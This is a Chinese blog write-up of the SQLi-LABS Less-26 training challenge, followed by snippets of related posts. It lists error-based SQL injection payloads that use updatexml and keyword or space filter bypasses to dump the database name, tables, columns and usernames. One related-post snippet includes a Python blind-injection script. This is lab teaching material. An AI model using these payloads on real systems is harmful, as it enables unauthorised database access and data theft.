sqli-less-26-less26a

最新推荐文章于 2025-07-31 09:35:53 发布

沐目_01

最新推荐文章于 2025-07-31 09:35:53 发布

阅读量1k

点赞数 1

CC 4.0 BY-SA版权

分类专栏：渗透

本文链接：https://blog.youkuaiyun.com/weixin_44077544/article/details/89189219

渗透专栏收录该内容

8 篇文章

订阅专栏

本文探讨了在特定过滤条件下，如何运用SQL注入技巧获取数据库信息。通过使用updatexml()函数和||运算符，结合特殊字符绕过，演示了数据库名、表名、字段名及数据的提取方法。

less-26 单引号 GET型

这关就有点过滤的意思了，过滤了上一关的东西，并且把空格和%23给过滤了。如果是ubuntu的话，可以用/**/，%0a等绕过，方便一些。但我的是windows，所以就只能用（）了。让后使用||来代替and，用‘1来闭合。
数据库：

-1’ || updatexml(1,concat(0x7e,(database()),0x7e),1)||'1

表：

1’||updatexml(1,concat(0x7e(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)=database()),0x7e),1)||'1

字段：

-1’ ||updatexml(1,concat(0x7e,(select (group_concat(column_name)) from (inFoorrmation_schema.columns) where
(table_name)=‘users’%26%26(table_schema=database())),0x7e),1) || '1
注：%26的url码代表的是&

数据：这里有一个知识点，因为要绕过空格，所以limit 就不能用了，但是updatexml（）只能爆32位，如果要爆的数据过多，就没有办法了。所以我们这里再使用一个在盲注中用过的函数 substr()，用法我就不讲了，基本用法应该都知道了。

从第一位到第32位： -1’ ||updatexml(1,substr(concat(0x7e,(select (group_concat(username)) from (users)),0x7e),1,32),1)||'1

从33位到64位：-1’ ||updatexml(1,substr(concat(0x7e,(select (group_concat(username)) from (users)),0x7e),33,64),1)||'1

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

沐目_01

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

SQLi-LABS Less-26&&Less-26a

m0_64898960的博客

04-27

2335

Less-26题目测试出需要“ ’ ”进行闭合经过一番尝试，发现or和and继续坐在ban位上，然后空格和一些符号如“+”也坐上了ban位… 可以利用报错函数，便可以不用理会空格的威胁… 查表 Less-26a Less-26a需要使用“ ') ”进行闭合继续尝试报错注入，发现报错注入已经没有我们想要的东西回显了… 只好根据题目，进行bool盲注即可 Less-26a总结判断是否存在小括号一开始怎么尝试都没有答案出来，后来百度原来还有个小括号，然后学习了一下如何判断是否还有小括号…真是裂

生命在于折腾——SQL注入的实操（六）less26-30

易水哲的博客

08-21

618

sql-lib项目，本篇文章介绍关卡26-30。

参与评论您还未登录，请先登录后发表或查看评论

sqli-labs通关笔记-第26关GET字符注入(多重关键字过滤绕过手注法)

最新发布

mooyuan的网络安全博客

07-31

952

SQLI-LABS 是一个专门为学习和练习 SQL 注入技术而设计的开源靶场环境，本小节对第26关Less 26基于GET字符型的SQL注入关卡进行渗透实战，该关卡过滤多个关键字（包括and、or、三类注释符号、空格等关键字）防止SQL注入攻击。

sqli-labs26

qq_53030229的博客

06-01

1151

文章目录一、审查源码1、判断注入点和闭合方式2、过滤方式二、SQL注入1、获取数据库双写绕过：anandd 大小写绕过And ASCII编码绕过 %20、%0a绕过内联注释：/!**/ 替换：如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过：%a0 || %0b 等等，过滤字符我们可以用 and || or 替代一、审查源码 1、判断注入点和闭合方式由于这个是与数据库交互的语句，通过这个判断

Less-26

老司机开代码的博客

08-04

829

文章目录1. 题目分析2. 思路分析2.1 不用空格2.1.1 报错注入2.1.2 盲注2.2 使用特殊字符代替空格 1. 题目分析这道题的坑算是比较多的了，我们来分析一下。通过初步测试发现这个题目过滤的东西有点多，直接看源码 function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id);

Sqli-labs之Less-26和Less-26a

→_→

04-22

1097

Less-26 GET-基于错误-您所有的空格和注释都属于我们待续

sqli-labs Less-26、26a、27、27a、28、28a（sqli-labs闯关指南 26、26a、27、27a、28、28a）—Advanced injection

m0_54899775的博客

12-25

1544

sqli-labs Less-26、26a、27、27a、28、28a（sqli-labs闯关指南 26、26a、27、27a、28、28a）—Advanced injection

sqli-labs通关笔记

m0_67795959的博客

10-23

1138

id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema = database() limit 3,1),".域名/123.txt")))--+要写为rand(0) 或者rand(4)：rand()函数的执行速度要比 group by查询并插入key值的速度更快，只有rand(0)这个顺序可以导致在插入第三个数据，rand执行第五次时导致键值冲突。

sqli-labs靶场通关

没有网络安全就没有国家安全

08-22

924

sqli-labs通关文牒

sqli-labs注入——sqli-labs的1-65关闯关指南

qq_51366383的博客

01-27

2030

sqli-labs图片上一共有75关，但是下载的资料都只有65关，所以只写了65关，本文仅是个人想法，如有不对请多谅解。前面三部分的数据为：security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password：Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,

SQLi LABS Less 25 联合注入+报错注入+布尔盲注

热门推荐

wangyuxiang946的博客

06-28

1万+

SQLi 第二十五关，SQLi-LABS Less-25，SQLi-LABS Less 25，SQLiLABS Less25，SQLi Less 25

SQL注入分析-less-26a

qq_33505576的博客

02-16

487

SQL注入分析-less-26a 1、还是按照提示，在地址栏输入参数。 http://192.168.88.129/sqli-labs-master/Less-26a/?id=1 正常回显，结果如下： 2、SQL注入的一般做法，还是输入单引号试试。 http://192.168.88.129/sqli-labs-master/Less-26a/?id=1%27 这里没有返回结果，也没有报错信息，有两种可能性，一种可能性是查询条件错误；另一种可能性是单引号导致SQL语句没有正常闭合，因为这关利用的

SQLi LABS Less 26a 联合注入+布尔盲注

wangyuxiang946的博客

08-15

1万+

SQLi 第26a关，SQLi-LABS Less-26a，SQLi-LABS Less 26a，SQLiLABS Less26a，SQLi Less 26a

SqliLabs Less26-26a

qq_45785324的博客

07-20

779

SqliLabs Less26 Less26a

sqli-labs/Less-26a

m0_71299382的博客

11-20

369

sqli-labs第二十六关a

SQL注入分析-less-26

qq_33505576的博客

02-15

1352

SQL注入分析-less-26 近期在学习SQL注入的知识，在此呢，写篇博客记录一下手工注入的过程，中间走的弯路呢就不多提了，主要把自己成功注入的过程和结果在此做一个记录，不喜勿喷哈！ 1、按照提示，在地址栏输入参数 http://192.168.88.129/sqli-labs-master/Less-26/?id=1 结果如下，正常回显：使用单引号看看页面会报什么信息： http://192.168.88.129/sqli-labs-master/Less-26/?id=1’ 从这里判断

sqli-labs ————less -26a

Fly_鹏程万里

05-16

1187

Less-26a查看一下源代码：查询语句：$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";过滤机制：function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace(...

sqli-labs/Less-26关

m0_71299382的博客

11-20

1642

sqli-labs第二十六关

sqli-labs- less7

12-28

### SQLi-7 教程与解决方案 #### 背景介绍 SQL注入是一种常见的攻击方式，通过向应用程序输入恶意的SQL语句来操纵数据库查询。SQLi-Labs 是一个用于练习和学习SQL注入技术的平台。 #### Less-7 特点分析 Less-7 主要关注基于布尔盲注（Boolean-based Blind Injection）的技术[^1]。这种类型的注入不依赖于错误消息返回具体的信息，而是利用条件判断来推断数据的存在与否。 #### 实验环境搭建为了进行实验，确保已经安装并配置好了PHP服务器以及MySQL数据库，并且成功部署了SQLi-Labs项目文件夹下的`/sqli/Less-7/`目录中的脚本[^2]。 #### 测试用例准备访问目标URL `http://localhost/sqli-labs/Less-7/?id=` 并尝试不同的参数值来进行测试。对于布尔盲注来说，通常会构造一些能够引起不同页面响应的行为模式作为基础： - 正常情况：当ID存在时显示正常的内容； - 错误情况：如果不存在对应的记录，则可能给出空白页或其他提示信息； #### 注入点发现在Less-7中，`id` 参数是一个潜在的注入点。可以先验证是否存在SQL注入漏洞，比如发送请求 `http://localhost/sqli-labs/Less-7/?id=1' AND '1'='1` 和 `http://localhost/sqli-labs/Less-7/?id=1' AND '1'='2` 来观察是否有区别性的反应。 #### 数据库版本探测实例一旦确认了注入的可能性之后，就可以进一步探索更多细节。例如获取当前使用的 MySQL 版本号可以通过如下方法实现： ```sql http://localhost/sqli-labs/Less-7/?id=-1 UNION SELECT @@version -- ``` 此命令将会把 `-1` 替换成实际存在的 ID 值加上联合选择操作符 (`UNION`) ，从而执行第二个查询并将结果集附加到原始查询的结果集中展示出来。 #### 字符串长度枚举技巧假设想要知道管理员用户名的具体字符数，那么可以根据ASCII码表逐位猜测直到找到匹配为止。下面是一段Python代码片段用来自动化这个过程: ```python import requests url = "http://localhost/sqli-labs/Less-7/" payload_true = "?id=1' AND ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),{},1))={}--" payload_false = "?id=1' AND ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),{},1))!={}--" for i in range(1, 20): for j in range(32, 128): r = requests.get(url + payload_true.format(i,j)) if "You are in" in r.text: print(chr(j), end='') break print() ``` 这段程序将依次遍历每一个位置上的字母直至整个字符串被还原完毕。